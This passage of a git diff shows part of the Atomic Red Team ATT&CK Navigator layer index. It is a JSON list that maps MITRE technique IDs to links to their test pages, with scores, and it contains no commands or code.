redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/ma
ster/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"tec
hniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T119
7","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T1216.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"ht
tps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":t
rue,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-te
am/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/
atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/ato
mics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-tea
m/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/a
tomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/
redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github
.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https
://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1572","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/a
tomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json index 9124ae71..87287bd4 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json 
@@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"},{"techniqueID":"T1003.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"},{"techniqueID":"T1003.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"},{"techniqueID":"T1003.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"},{"techniqueID":"T1003.006","score":100,"